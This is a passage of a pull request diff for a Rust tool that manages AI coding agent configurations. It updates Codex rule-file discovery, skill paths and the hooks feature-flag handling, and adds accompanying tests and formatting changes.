### PR TITLE
fix(codex): align adapter with current docs + cross-vendor install propagation

### DIFF
--- a/crates/hk-core/src/adapter/codex.rs
+++ b/crates/hk-core/src/adapter/codex.rs
@@ -8,6 +8,17 @@
 use super::{AgentAdapter, HookEntry, McpFormat, McpServerEntry, PluginEntry, ProjectMarker};
 use std::path::{Path, PathBuf};
 
+/// Codex's built-in fallback order for project doc files. Matches Codex's
+/// own default per https://developers.openai.com/codex/guides/agents-md;
+/// users may shadow this list via `project_doc_fallback_filenames` in
+/// `~/.codex/config.toml`.
+const DEFAULT_DOC_FALLBACK_FILENAMES: &[&str] = &[
+    "AGENTS.override.md",
+    "AGENTS.md",
+    "TEAM_GUIDE.md",
+    ".agents.md",
+];
+
 pub struct CodexAdapter {
     home: PathBuf,
 }
@@ -34,6 +45,49 @@ impl CodexAdapter {
         let content = std::fs::read_to_string(path).ok()?;
         serde_json::from_str(&content).ok()
     }
+
+    /// Resolved doc filename fallback list, in the order Codex itself searches.
+    /// Reads `project_doc_fallback_filenames` from `~/.codex/config.toml` if
+    /// the user has overridden the default; falls back to the built-in list
+    /// otherwise.
+    ///
+    /// Cases that fall back to defaults: missing file, malformed TOML, key
+    /// absent, key set to a non-array, or array that resolves to no usable
+    /// names (all empty/non-string entries). HK's role here is discovery, not
+    /// enforcement — surfacing rule files that exist on disk is more useful
+    /// than honoring a degenerate user override that hides them.
+    fn doc_fallback_filenames(&self) -> Vec<String> {
+        let override_list: Vec<String> =
+            std::fs::read_to_string(self.base_dir().join("config.toml"))
+                .ok()
+                .and_then(|content| content.parse::<toml::Table>().ok())
+                .and_then(|doc| {
+                    doc.get("project_doc_fallback_filenames")
+                        .and_then(|v| v.as_array())
+                        .map(|arr| {
+                            arr.iter()
+                                .filter_map(|v| v.as_str())
+                                .filter(|s| !s.is_empty())
+                                .map(String::from)
+                                .collect()
+                        })
+                })
+                .unwrap_or_default();
+        if override_list.is_empty() {
+            Self::default_doc_fallback_filenames()
+        } else {
+            override_list
+        }
+    }
+
+    /// The built-in fallback list as `Vec<String>` — extracted so callers
+    /// don't repeat the const-to-owned conversion.
+    fn default_doc_fallback_filenames() -> Vec<String> {
+        DEFAULT_DOC_FALLBACK_FILENAMES
+            .iter()
+            .map(|s| (*s).to_string())
+            .collect()
+    }
 }
 
 impl AgentAdapter for CodexAdapter {
@@ -47,9 +101,14 @@ impl AgentAdapter for CodexAdapter {
         self.base_dir().exists()
     }
     fn skill_dirs(&self) -> Vec<PathBuf> {
+        // `~/.agents/skills` is the canonical user-scope path per current docs
+        // (https://developers.openai.com/codex/skills); `~/.codex/skills` is
+        // marked "Deprecated user skills location, kept for backward
+        // compatibility" in Codex's own loader source at v0.130.0
+        // (codex-rs/core-skills/src/loader.rs:293-301). Scan canonical first.
         vec![
-            self.base_dir().join("skills"),
             self.home.join(".agents").join("skills"),
+            self.base_dir().join("skills"),
         ]
     }
     fn mcp_config_path(&self) -> PathBuf {
@@ -66,10 +125,12 @@ impl AgentAdapter for CodexAdapter {
     }
 
     fn global_rules_files(&self) -> Vec<PathBuf> {
-        vec![
-            self.base_dir().join("AGENTS.md"),
-            self.base_dir().join("AGENTS.override.md"),
-        ]
+        // Same fallback list applies at every layer Codex searches —
+        // global (`~/.codex/`) included.
+        self.doc_fallback_filenames()
+            .into_iter()
+            .map(|name| self.base_dir().join(name))
+            .collect()
     }
 
     fn global_settings_files(&self) -> Vec<PathBuf> {
@@ -89,6 +150,13 @@ impl AgentAdapter for CodexAdapter {
         // ~/.codex/memories/*.md — explicit `is_file()` preserves prior
         // semantics (rejects a hypothetical directory whose name ends in
         // `.md`); cheap parity over a "siblings don't bother" argument.
+        //
+        // Do NOT extend this to scan ~/.codex/memories_extensions/chronicle/.
+        // Chronicle is a screen-recording research preview (opt-in,
+        // ChatGPT Pro / macOS only) whose on-disk files contain unencrypted
+        // OCR'd screen content. Surfacing those to HK's Memory section would
+        // be a privacy footgun even though the files are technically readable.
+        // Source: https://developers.openai.com/codex/memories/chronicle
         super::files_with_ext(&self.base_dir().join("memories"), "md")
             .filter(|p| p.is_file())
             .collect()
@@ -99,7 +167,7 @@ impl AgentAdapter for CodexAdapter {
     }
 
     fn project_rules_patterns(&self) -> Vec<String> {
-        vec!["AGENTS.md".into(), "AGENTS.override.md".into()]
+        self.doc_fallback_filenames()
     }
 
     fn project_settings_patterns(&self) -> Vec<String> {
@@ -108,6 +176,19 @@ impl AgentAdapter for CodexAdapter {
 
     fn project_subagent_patterns(&self) -> Vec<String> {
         vec![".codex/agents/*.toml".into()]
+    }
+
+    fn project_hook_config_relpath(&self) -> Option<String> {
+        // Project-level Codex hooks live at `<repo>/.codex/hooks.json`. Codex
+        // also supports inline `[hooks]` tables in `<repo>/.codex/config.toml`
+        // — HK does not surface that form (asymmetric read/write would let
+        // users see hooks they can't redeploy). Source:
+        // https://developers.openai.com/codex/hooks
+        //
+        // Codex requires a per-project trust grant before these hooks
+        // execute; the file exists on disk regardless, so HK scans it as
+        // discovery surface independent of trust state.
+        Some(".codex/hooks.json".into())
     }
 
     fn project_skill_dirs(&self) -> Vec<String> {
@@ -228,21 +309,24 @@ impl AgentAdapter for CodexAdapter {
 
     fn read_plugins(&self) -> Vec<PluginEntry> {
         // Read disabled plugins from config.toml [plugins."name@source"] enabled = false
-        let disabled_plugins: std::collections::HashSet<String> = std::fs::read_to_string(self.mcp_config_path()).ok()
-            .and_then(|content| content.parse::<toml::Table>().ok())
-            .and_then(|doc| doc.get("plugins").and_then(|v| v.as_table()).cloned())
-            .map(|plugins| {
-                plugins.into_iter()
-                    .filter(|(_, v)| {
-                        v.as_table()
-                            .and_then(|t| t.get("enabled"))
-                            .and_then(|e| e.as_bool())
-                            == Some(false)
-                    })
-                    .map(|(k, _)| k)
-                    .collect()
-            })
-            .unwrap_or_default();
+        let disabled_plugins: std::collections::HashSet<String> =
+            std::fs::read_to_string(self.mcp_config_path())
+                .ok()
+                .and_then(|content| content.parse::<toml::Table>().ok())
+                .and_then(|doc| doc.get("plugins").and_then(|v| v.as_table()).cloned())
+                .map(|plugins| {
+                    plugins
+                        .into_iter()
+                        .filter(|(_, v)| {
+                            v.as_table()
+                                .and_then(|t| t.get("enabled"))
+                                .and_then(|e| e.as_bool())
+                                == Some(false)
+                        })
+                        .map(|(k, _)| k)
+                        .collect()
+                })
+                .unwrap_or_default();
 
         // Codex plugins are cached at ~/.codex/plugins/cache/{marketplace}/{plugin}/{version}/
         // Each has .codex-plugin/plugin.json manifest
@@ -304,7 +388,8 @@ impl AgentAdapter for CodexAdapter {
                     entries.push(PluginEntry {
                         name: name.clone(),
                         source: marketplace_name.clone(),
-                        enabled: !disabled_plugins.contains(&format!("{}@{}", name, &marketplace_name)),
+                        enabled: !disabled_plugins
+                            .contains(&format!("{}@{}", name, &marketplace_name)),
                         path: Some(version_dir.path().to_path_buf()), // version level — matches manifest location
                         uri: None,
                         installed_at: None,
@@ -456,7 +541,9 @@ mod tests {
         let adapter = CodexAdapter::with_home(tmp.path().to_path_buf());
 
         // Set up a plugin in cache
-        let plugin_dir = tmp.path().join(".codex/plugins/cache/test-marketplace/my-plugin/1.0.0/.codex-plugin");
+        let plugin_dir = tmp
+            .path()
+            .join(".codex/plugins/cache/test-marketplace/my-plugin/1.0.0/.codex-plugin");
         fs::create_dir_all(&plugin_dir).unwrap();
         fs::write(plugin_dir.join("plugin.json"), r#"{"name":"my-plugin"}"#).unwrap();
 
@@ -467,14 +554,21 @@ mod tests {
 
         // config.toml with plugin disabled
         let config_path = tmp.path().join(".codex/config.toml");
-        fs::write(&config_path, r#"
+        fs::write(
+            &config_path,
+            r#"
 [plugins."my-plugin@test-marketplace"]
 enabled = false
-"#).unwrap();
+"#,
+        )
+        .unwrap();
 
         let entries = adapter.read_plugins();
         assert_eq!(entries.len(), 1);
-        assert!(!entries[0].enabled, "Plugin should be disabled per config.toml");
+        assert!(
+            !entries[0].enabled,
+            "Plugin should be disabled per config.toml"
+        );
     }
 
     #[test]
@@ -508,7 +602,11 @@ enabled = false
         fs::write(agents_dir.join("notes.md"), "ignore — wrong ext").unwrap();
 
         let subagents = adapter.global_subagent_files();
-        assert!(subagents.iter().any(|p| p.ends_with("agents/reviewer.toml")));
+        assert!(
+            subagents
+                .iter()
+                .any(|p| p.ends_with("agents/reviewer.toml"))
+        );
         assert!(
             !subagents.iter().any(|p| p.ends_with("notes.md")),
             ".md files in Codex agents/ must be filtered (Codex uses .toml)"
@@ -518,5 +616,116 @@ enabled = false
             adapter.project_subagent_patterns(),
             vec![".codex/agents/*.toml".to_string()]
         );
+    }
+
+    #[test]
+    fn doc_fallback_returns_default_when_config_missing() {
+        let tmp = tempfile::tempdir().unwrap();
+        let adapter = CodexAdapter::with_home(tmp.path().to_path_buf());
+        assert_eq!(
+            adapter.doc_fallback_filenames(),
+            vec![
+                "AGENTS.override.md",
+                "AGENTS.md",
+                "TEAM_GUIDE.md",
+                ".agents.md"
+            ]
+        );
+    }
+
+    #[test]
+    fn doc_fallback_returns_default_when_key_absent() {
+        let tmp = tempfile::tempdir().unwrap();
+        let codex_dir = tmp.path().join(".codex");
+        fs::create_dir_all(&codex_dir).unwrap();
+        fs::write(codex_dir.join("config.toml"), "[features]\nhooks = true\n").unwrap();
+        let adapter = CodexAdapter::with_home(tmp.path().to_path_buf());
+        assert_eq!(adapter.doc_fallback_filenames().len(), 4);
+        assert_eq!(adapter.doc_fallback_filenames()[0], "AGENTS.override.md");
+    }
+
+    #[test]
+    fn doc_fallback_honors_user_override() {
+        let tmp = tempfile::tempdir().unwrap();
+        let codex_dir = tmp.path().join(".codex");
+        fs::create_dir_all(&codex_dir).unwrap();
+        fs::write(
+            codex_dir.join("config.toml"),
+            r#"project_doc_fallback_filenames = ["MY_GUIDE.md", "AGENTS.md"]"#,
+        )
+        .unwrap();
+        let adapter = CodexAdapter::with_home(tmp.path().to_path_buf());
+        assert_eq!(
+            adapter.doc_fallback_filenames(),
+            vec!["MY_GUIDE.md", "AGENTS.md"]
+        );
+    }
+
+    #[test]
+    fn doc_fallback_treats_empty_array_as_no_override() {
+        // HK is a discovery tool: an explicit empty list would suppress all
+        // rule-file detection, hiding files that genuinely exist on disk.
+        // Fall through to defaults so Codex's auto-injection preference
+        // doesn't blind HK's UI.
+        let tmp = tempfile::tempdir().unwrap();
+        let codex_dir = tmp.path().join(".codex");
+        fs::create_dir_all(&codex_dir).unwrap();
+        fs::write(
+            codex_dir.join("config.toml"),
+            "project_doc_fallback_filenames = []",
+        )
+        .unwrap();
+        let adapter = CodexAdapter::with_home(tmp.path().to_path_buf());
+        assert_eq!(adapter.doc_fallback_filenames().len(), 4);
+    }
+
+    #[test]
+    fn doc_fallback_drops_empty_string_entries() {
+        // `base_dir().join("")` resolves to base_dir itself (a directory),
+        // which would surface as a bogus "rule file" candidate.
+        let tmp = tempfile::tempdir().unwrap();
+        let codex_dir = tmp.path().join(".codex");
+        fs::create_dir_all(&codex_dir).unwrap();
+        fs::write(
+            codex_dir.join("config.toml"),
+            r#"project_doc_fallback_filenames = ["", "GUIDE.md", ""]"#,
+        )
+        .unwrap();
+        let adapter = CodexAdapter::with_home(tmp.path().to_path_buf());
+        assert_eq!(adapter.doc_fallback_filenames(), vec!["GUIDE.md"]);
+    }
+
+    #[test]
+    fn doc_fallback_silently_falls_back_on_corrupted_toml() {
+        // Mirror Codex's own behavior: a malformed config doesn't break
+        // file discovery; we just use the built-in defaults.
+        let tmp = tempfile::tempdir().unwrap();
+        let codex_dir = tmp.path().join(".codex");
+        fs::create_dir_all(&codex_dir).unwrap();
+        fs::write(codex_dir.join("config.toml"), "this is not valid TOML [[[").unwrap();
+        let adapter = CodexAdapter::with_home(tmp.path().to_path_buf());
+        assert_eq!(adapter.doc_fallback_filenames().len(), 4);
+    }
+
+    #[test]
+    fn global_and_project_rules_use_resolved_fallback() {
+        // The resolved list flows into BOTH global_rules_files and
+        // project_rules_patterns — same config, every layer Codex searches.
+        let tmp = tempfile::tempdir().unwrap();
+        let codex_dir = tmp.path().join(".codex");
+        fs::create_dir_all(&codex_dir).unwrap();
+        fs::write(
+            codex_dir.join("config.toml"),
+            r#"project_doc_fallback_filenames = ["A.md", "B.md"]"#,
+        )
+        .unwrap();
+        let adapter = CodexAdapter::with_home(tmp.path().to_path_buf());
+
+        let globals = adapter.global_rules_files();
+        assert_eq!(globals.len(), 2);
+        assert!(globals[0].ends_with(".codex/A.md"));
+        assert!(globals[1].ends_with(".codex/B.md"));
+
+        assert_eq!(adapter.project_rules_patterns(), vec!["A.md", "B.md"]);
     }
 }

--- a/crates/hk-core/src/deployer.rs
+++ b/crates/hk-core/src/deployer.rs
@@ -68,7 +68,13 @@ fn copy_dir_recursive(src: &Path, dst: &Path) -> Result<(), HkError> {
 /// with `-` so that names like `microsoft/markitdown` become `microsoft-markitdown`.
 pub fn sanitize_mcp_name(name: &str) -> String {
     name.chars()
-        .map(|c| if c.is_ascii_alphanumeric() || c == '_' || c == '-' { c } else { '-' })
+        .map(|c| {
+            if c.is_ascii_alphanumeric() || c == '_' || c == '-' {
+                c
+            } else {
+                '-'
+            }
+        })
         .collect()
 }
 
@@ -240,10 +246,7 @@ fn deploy_mcp_server_toml(config_path: &Path, entry: &McpServerEntry) -> Result<
     // consistent grouping with other agents that use the unsanitized name.
     let safe_name = sanitize_mcp_name(&entry.name);
     if safe_name != entry.name {
-        server_table.insert(
-            "_hk_name".into(),
-            toml::Value::String(entry.name.clone()),
-        );
+        server_table.insert("_hk_name".into(), toml::Value::String(entry.name.clone()));
     }
     mcp_servers.insert(safe_name, toml::Value::Table(server_table));
 
@@ -273,10 +276,7 @@ fn deploy_mcp_server_toml(config_path: &Path, entry: &McpServerEntry) -> Result<
 /// formatting in opencode.jsonc (or opencode.json — OpenCode's loader
 /// runs both through jsonc-parser) survive a deploy. Replaces an
 /// existing same-named entry in place rather than re-appending.
-fn deploy_mcp_server_opencode(
-    config_path: &Path,
-    entry: &McpServerEntry,
-) -> Result<(), HkError> {
+fn deploy_mcp_server_opencode(config_path: &Path, entry: &McpServerEntry) -> Result<(), HkError> {
     let value = build_opencode_mcp_value(entry);
     locked_modify_jsonc(config_path, |root| {
         let mcp = root.object_value_or_set("mcp");
@@ -804,7 +804,9 @@ pub fn set_codex_plugin_enabled(
     let mut doc: toml::Table = if content.is_empty() {
         toml::Table::new()
     } else {
-        content.parse::<toml::Table>().map_err(|e| HkError::ConfigCorrupted(e.to_string()))?
+        content
+            .parse::<toml::Table>()
+            .map_err(|e| HkError::ConfigCorrupted(e.to_string()))?
     };
     let plugins = doc
         .entry("plugins")
@@ -829,10 +831,7 @@ pub fn set_codex_plugin_enabled(
 }
 
 /// Remove a [plugins."plugin_key"] entry from Codex config.toml.
-pub fn remove_codex_plugin_entry(
-    config_path: &Path,
-    plugin_key: &str,
-) -> Result<(), HkError> {
+pub fn remove_codex_plugin_entry(config_path: &Path, plugin_key: &str) -> Result<(), HkError> {
     if !config_path.exists() {
         return Ok(());
     }
@@ -870,9 +869,7 @@ pub fn set_vscode_plugin_enabled(
     plugin_uri: &str,
     enabled: bool,
 ) -> Result<(), HkError> {
-    let db_path = vscode_user_dir
-        .join("globalStorage")
-        .join("state.vscdb");
+    let db_path = vscode_user_dir.join("globalStorage").join("state.vscdb");
     let conn = rusqlite::Connection::open(&db_path)
         .map_err(|e| HkError::Internal(format!("Failed to open VS Code state DB: {}", e)))?;
 
@@ -885,8 +882,7 @@ pub fn set_vscode_plugin_enabled(
         )
         .unwrap_or_else(|_| "[]".to_string());
 
-    let mut entries: Vec<(String, bool)> =
-        serde_json::from_str(&current).unwrap_or_default();
+    let mut entries: Vec<(String, bool)> = serde_json::from_str(&current).unwrap_or_default();
 
     // Update or insert the entry
     let mut found = false;
@@ -901,8 +897,8 @@ pub fn set_vscode_plugin_enabled(
         entries.push((plugin_uri.to_string(), enabled));
     }
 
-    let new_value = serde_json::to_string(&entries)
-        .map_err(|e| HkError::Internal(e.to_string()))?;
+    let new_value =
+        serde_json::to_string(&entries).map_err(|e| HkError::Internal(e.to_string()))?;
 
     conn.execute(
         "INSERT INTO ItemTable (key, value) VALUES ('agentPlugins.enablement', ?1)
@@ -915,10 +911,7 @@ pub fn set_vscode_plugin_enabled(
 }
 
 /// Remove a plugin entry from VS Code's state.vscdb enablement array.
-pub fn remove_vscode_plugin_entry(
-    vscode_user_dir: &Path,
-    plugin_uri: &str,
-) -> Result<(), HkError> {
+pub fn remove_vscode_plugin_entry(vscode_user_dir: &Path, plugin_uri: &str) -> Result<(), HkError> {
     let db_path = vscode_user_dir.join("globalStorage").join("state.vscdb");
     if !db_path.exists() {
         return Ok(());
@@ -934,13 +927,12 @@ pub fn remove_vscode_plugin_entry(
         )
         .unwrap_or_else(|_| "[]".to_string());
 
-    let mut entries: Vec<(String, bool)> =
-        serde_json::from_str(&current).unwrap_or_default();
+    let mut entries: Vec<(String, bool)> = serde_json::from_str(&current).unwrap_or_default();
 
     entries.retain(|e| e.0 != plugin_uri);
 
-    let new_value = serde_json::to_string(&entries)
-        .map_err(|e| HkError::Internal(e.to_string()))?;
+    let new_value =
+        serde_json::to_string(&entries).map_err(|e| HkError::Internal(e.to_string()))?;
 
     conn.execute(
         "INSERT INTO ItemTable (key, value) VALUES ('agentPlugins.enablement', ?1)
@@ -1029,8 +1021,8 @@ fn modify_gemini_enablement(
 
     modify(&mut config)?;
 
-    let output = serde_json::to_string_pretty(&config)
-        .map_err(|e| HkError::Internal(e.to_string()))?;
+    let output =
+        serde_json::to_string_pretty(&config).map_err(|e| HkError::Internal(e.to_string()))?;
     (&file).seek(SeekFrom::Start(0))?;
     file.set_len(0)?;
     (&file).write_all(output.as_bytes())?;
@@ -1061,25 +1053,48 @@ pub fn restore_plugin_entry(
 }
 
 /// Ensure Codex hooks feature is enabled in config.toml.
-/// Codex requires `[features] codex_hooks = true` to activate hook support.
+///
+/// Codex requires `[features] hooks = true` to activate hook support. The
+/// flag was originally named `codex_hooks` and was renamed to `hooks` in a
+/// recent release; Codex still honors the old name with a deprecation warning,
+/// so we don't editorialize and accept either form as "already enabled".
+///
+/// Parse-modify-serialize (rather than string append) is required so that a
+/// pre-existing `[features]` table gets the new key inserted in-place,
+/// instead of producing a duplicate section that TOML rejects on re-parse.
 pub fn ensure_codex_hooks_enabled(codex_base_dir: &Path) -> Result<(), HkError> {
+    // No flock (cf. `set_codex_plugin_enabled`): single-caller deploy path.
     let config_toml = codex_base_dir.join("config.toml");
+    if let Some(parent) = config_toml.parent() {
+        std::fs::create_dir_all(parent)?;
+    }
     let content = if config_toml.exists() {
         std::fs::read_to_string(&config_toml)?
     } else {
         String::new()
     };
-    // Check if already enabled
-    if content.contains("codex_hooks") {
+    let mut doc: toml::Table = if content.is_empty() {
+        toml::Table::new()
+    } else {
+        content
+            .parse::<toml::Table>()
+            .map_err(|e| HkError::ConfigCorrupted(e.to_string()))?
+    };
+
+    let features = doc
+        .entry("features")
+        .or_insert_with(|| toml::Value::Table(toml::Table::new()))
+        .as_table_mut()
+        .ok_or_else(|| HkError::ConfigCorrupted("features is not a table".into()))?;
+    // Codex honors either `hooks` (canonical) or `codex_hooks` (deprecated);
+    // skip rewriting in either case.
+    if features.contains_key("hooks") || features.contains_key("codex_hooks") {
         return Ok(());
     }
-    // Append the feature flag
-    let mut new_content = content;
-    if !new_content.ends_with('\n') && !new_content.is_empty() {
-        new_content.push('\n');
-    }
-    new_content.push_str("\n[features]\ncodex_hooks = true\n");
-    atomic_write(&config_toml, &new_content)?;
+    features.insert("hooks".into(), toml::Value::Boolean(true));
+
+    let output = toml::to_string_pretty(&doc).map_err(|e| HkError::Internal(e.to_string()))?;
+    atomic_write(&config_toml, &output)?;
     Ok(())
 }
 
@@ -1287,7 +1302,9 @@ fn to_cst_input(v: &serde_json::Value) -> jsonc_parser::cst::CstInputValue {
             CstInputValue::Array(arr.iter().map(to_cst_input).collect())
         }
         serde_json::Value::Object(obj) => CstInputValue::Object(
-            obj.iter().map(|(k, v)| (k.clone(), to_cst_input(v))).collect(),
+            obj.iter()
+                .map(|(k, v)| (k.clone(), to_cst_input(v)))
+                .collect(),
         ),
     }
 }
@@ -1327,7 +1344,11 @@ where
     // Empty file → seed with "{}" so CstRootNode::parse always sees an
     // object root. Avoids bailing on a freshly-created config file whose
     // first write would otherwise be the root entry itself.
-    let seed = if content.is_empty() { "{}" } else { content.as_str() };
+    let seed = if content.is_empty() {
+        "{}"
+    } else {
+        content.as_str()
+    };
 
     let cst = CstRootNode::parse(seed, &Default::default())
         .map_err(|e| HkError::ConfigCorrupted(format!("Failed to parse jsonc: {e}")))?;
@@ -1429,7 +1450,10 @@ mod tests {
 
         let written = std::fs::read_to_string(&path).unwrap();
         assert!(written.contains("// top note"), "top-level comment dropped");
-        assert!(written.contains("// about github"), "mcp child comment dropped");
+        assert!(
+            written.contains("// about github"),
+            "mcp child comment dropped"
+        );
         assert!(written.contains("\"github\""), "existing entry lost");
         assert!(written.contains("\"filesystem\""), "appended entry missing");
     }
@@ -1484,7 +1508,10 @@ mod tests {
 
         let written = std::fs::read_to_string(&config).unwrap();
         assert!(written.contains("// top note"));
-        assert!(written.contains("// about filesystem"), "sibling comment dropped");
+        assert!(
+            written.contains("// about filesystem"),
+            "sibling comment dropped"
+        );
         assert!(written.contains("\"filesystem\""), "sibling entry lost");
         assert!(!written.contains("\"github\""), "target entry not removed");
     }
@@ -1535,11 +1562,20 @@ mod tests {
         deploy_mcp_server(&config, &entry, McpFormat::Opencode).unwrap();
 
         let written = std::fs::read_to_string(&config).unwrap();
-        assert!(written.contains("// top note kept"), "top-level comment dropped");
-        assert!(written.contains("// about github"), "mcp child comment dropped");
+        assert!(
+            written.contains("// top note kept"),
+            "top-level comment dropped"
+        );
+        assert!(
+            written.contains("// about github"),
+            "mcp child comment dropped"
+        );
         assert!(written.contains("\"github\""), "existing entry lost");
         assert!(written.contains("\"filesystem\""), "deployed entry missing");
-        assert!(written.contains("\"npx\""), "deployed entry's command missing");
+        assert!(
+            written.contains("\"npx\""),
+            "deployed entry's command missing"
+        );
     }
 
     // ----- existing tests below -----
@@ -1728,8 +1764,14 @@ mod tests {
         assert_eq!(server["command"][2], "@modelcontextprotocol/server-github");
         assert_eq!(server["environment"]["GITHUB_TOKEN"], "ghp_test");
         // additionalProperties: false is enforced upstream — verify we honor it.
-        assert!(server.get("args").is_none(), "must not emit a separate args field");
-        assert!(server.get("env").is_none(), "must use 'environment', not 'env'");
+        assert!(
+            server.get("args").is_none(),
+            "must not emit a separate args field"
+        );
+        assert!(
+            server.get("env").is_none(),
+            "must use 'environment', not 'env'"
+        );
     }
 
     #[test]
@@ -1803,22 +1845,22 @@ mod tests {
         .unwrap();
 
         // read
-        let saved =
-            read_mcp_server_config(&config, "github", McpFormat::Opencode).unwrap();
-        assert!(saved.is_some(), "read must find entry under 'mcp', not 'mcpServers'");
+        let saved = read_mcp_server_config(&config, "github", McpFormat::Opencode).unwrap();
+        assert!(
+            saved.is_some(),
+            "read must find entry under 'mcp', not 'mcpServers'"
+        );
         let saved = saved.unwrap();
         assert_eq!(saved["environment"]["TOKEN"], "abc");
 
         // remove
         remove_mcp_server(&config, "github", McpFormat::Opencode).unwrap();
-        let after_remove =
-            read_mcp_server_config(&config, "github", McpFormat::Opencode).unwrap();
+        let after_remove = read_mcp_server_config(&config, "github", McpFormat::Opencode).unwrap();
         assert!(after_remove.is_none(), "remove must delete from 'mcp' key");
 
         // restore
         restore_mcp_server(&config, "github", &saved, McpFormat::Opencode).unwrap();
-        let restored =
-            read_mcp_server_config(&config, "github", McpFormat::Opencode).unwrap();
+        let restored = read_mcp_server_config(&config, "github", McpFormat::Opencode).unwrap();
         assert_eq!(
             restored.unwrap(),
             saved,
@@ -1866,7 +1908,10 @@ mod tests {
 
     #[test]
     fn test_sanitize_mcp_name_replaces_slash() {
-        assert_eq!(sanitize_mcp_name("microsoft/markitdown"), "microsoft-markitdown");
+        assert_eq!(
+            sanitize_mcp_name("microsoft/markitdown"),
+            "microsoft-markitdown"
+        );
     }
 
     #[test]
@@ -1928,7 +1973,10 @@ mod tests {
     fn test_resolve_command_path_resolves_known_command() {
         // "ls" should resolve to an absolute path on any Unix system.
         let resolved = resolve_command_path("ls");
-        assert!(resolved.starts_with('/'), "expected absolute path, got: {resolved}");
+        assert!(
+            resolved.starts_with('/'),
+            "expected absolute path, got: {resolved}"
+        );
     }
 
     #[test]
@@ -2001,8 +2049,8 @@ mod tests {
         deploy_mcp_server(&config, &entry, McpFormat::Toml).unwrap();
 
         // Read using the original (unsanitized) name
-        let result = read_mcp_server_config(&config, "microsoft/markitdown", McpFormat::Toml)
-            .unwrap();
+        let result =
+            read_mcp_server_config(&config, "microsoft/markitdown", McpFormat::Toml).unwrap();
         assert!(result.is_some(), "should find entry via original name");
         assert_eq!(result.unwrap()["command"], "uvx");
     }
@@ -2026,8 +2074,8 @@ mod tests {
         remove_mcp_server(&config, "microsoft/markitdown", McpFormat::Toml).unwrap();
 
         // Verify it's gone
-        let result = read_mcp_server_config(&config, "microsoft/markitdown", McpFormat::Toml)
-            .unwrap();
+        let result =
+            read_mcp_server_config(&config, "microsoft/markitdown", McpFormat::Toml).unwrap();
         assert!(result.is_none(), "entry should be removed");
     }
 
@@ -2410,7 +2458,9 @@ mod tests {
 
         let content: serde_json::Value =
             serde_json::from_str(&std::fs::read_to_string(&config).unwrap()).unwrap();
-        let hooks = content["hooks"]["post_cascade_response"].as_array().unwrap();
+        let hooks = content["hooks"]["post_cascade_response"]
+            .as_array()
+            .unwrap();
         assert_eq!(hooks.len(), 1);
         assert_eq!(hooks[0]["command"], "echo other");
     }
@@ -2480,7 +2530,8 @@ mod tests {
 
         let content: serde_json::Value = serde_json::from_str(
             &std::fs::read_to_string(ext_dir.join("extension-enablement.json")).unwrap(),
-        ).unwrap();
+        )
+        .unwrap();
         let overrides = content["my-ext"]["overrides"].as_array().unwrap();
         assert_eq!(overrides.len(), 1);
         let expected = format!("!{}/*", home.to_string_lossy());
@@ -2499,7 +2550,8 @@ mod tests {
 
         let content: serde_json::Value = serde_json::from_str(
             &std::fs::read_to_string(ext_dir.join("extension-enablement.json")).unwrap(),
-        ).unwrap();
+        )
+        .unwrap();
         let overrides = content["my-ext"]["overrides"].as_array().unwrap();
         assert_eq!(overrides.len(), 1);
         let expected = format!("{}/*", home.to_string_lossy());
@@ -2516,13 +2568,15 @@ mod tests {
         std::fs::write(
             ext_dir.join("extension-enablement.json"),
             r#"{"other-ext": {"overrides": ["!/some/workspace/*"]}}"#,
-        ).unwrap();
+        )
+        .unwrap();
 
         set_gemini_extension_enabled(&ext_dir, "my-ext", false, home).unwrap();
 
         let content: serde_json::Value = serde_json::from_str(
             &std::fs::read_to_string(ext_dir.join("extension-enablement.json")).unwrap(),
-        ).unwrap();
+        )
+        .unwrap();
         assert!(content["other-ext"]["overrides"].as_array().unwrap().len() == 1);
         assert!(content["my-ext"]["overrides"].as_array().unwrap().len() == 1);
     }
@@ -2543,13 +2597,15 @@ mod tests {
         std::fs::write(
             ext_dir.join("extension-enablement.json"),
             initial.to_string(),
-        ).unwrap();
+        )
+        .unwrap();
 
         set_gemini_extension_enabled(&ext_dir, "my-ext", false, home).unwrap();
 
         let content: serde_json::Value = serde_json::from_str(
             &std::fs::read_to_string(ext_dir.join("extension-enablement.json")).unwrap(),
-        ).unwrap();
+        )
+        .unwrap();
         let overrides = content["my-ext"]["overrides"].as_array().unwrap();
         assert_eq!(overrides.len(), 2);
         assert_eq!(overrides[0].as_str().unwrap(), "!/some/workspace/*");
@@ -2572,7 +2628,8 @@ mod tests {
 
         let content: serde_json::Value = serde_json::from_str(
             &std::fs::read_to_string(ext_dir.join("extension-enablement.json")).unwrap(),
-        ).unwrap();
+        )
+        .unwrap();
         assert!(content.get("ext-a").is_none(), "ext-a should be removed");
         assert!(content.get("ext-b").is_some(), "ext-b should remain");
     }
@@ -2589,13 +2646,81 @@ mod tests {
         // Remove one
         remove_codex_plugin_entry(&config, "pluginA@marketplace").unwrap();
 
-        let content: toml::Table = std::fs::read_to_string(&config)
-            .unwrap()
-            .parse()
-            .unwrap();
+        let content: toml::Table = std::fs::read_to_string(&config).unwrap().parse().unwrap();
         let plugins = content["plugins"].as_table().unwrap();
         assert!(!plugins.contains_key("pluginA@marketplace"));
         assert!(plugins.contains_key("pluginB@marketplace"));
+    }
+
+    /// Helper: read config.toml, return the `[features]` table (panics if missing/wrong type).
+    fn read_features(config_path: &Path) -> toml::Table {
+        let parsed: toml::Table = std::fs::read_to_string(config_path)
+            .unwrap()
+            .parse()
+            .unwrap();
+        parsed["features"].as_table().unwrap().clone()
+    }
+
+    #[test]
+    fn ensure_codex_hooks_appends_when_missing() {
+        let dir = TempDir::new().unwrap();
+        ensure_codex_hooks_enabled(dir.path()).unwrap();
+        let features = read_features(&dir.path().join("config.toml"));
+        assert_eq!(features["hooks"].as_bool(), Some(true));
+        assert!(!features.contains_key("codex_hooks"));
+    }
+
+    #[test]
+    fn ensure_codex_hooks_skips_when_canonical_flag_present() {
+        let dir = TempDir::new().unwrap();
+        let config = dir.path().join("config.toml");
+        std::fs::write(&config, "[features]\nhooks = true\n").unwrap();
+        let before = std::fs::read_to_string(&config).unwrap();
+        ensure_codex_hooks_enabled(dir.path()).unwrap();
+        let after = std::fs::read_to_string(&config).unwrap();
+        assert_eq!(
+            before, after,
+            "config must not be rewritten when hooks=true"
+        );
+    }
+
+    #[test]
+    fn ensure_codex_hooks_skips_when_deprecated_flag_present() {
+        let dir = TempDir::new().unwrap();
+        let config = dir.path().join("config.toml");
+        std::fs::write(&config, "[features]\ncodex_hooks = true\n").unwrap();
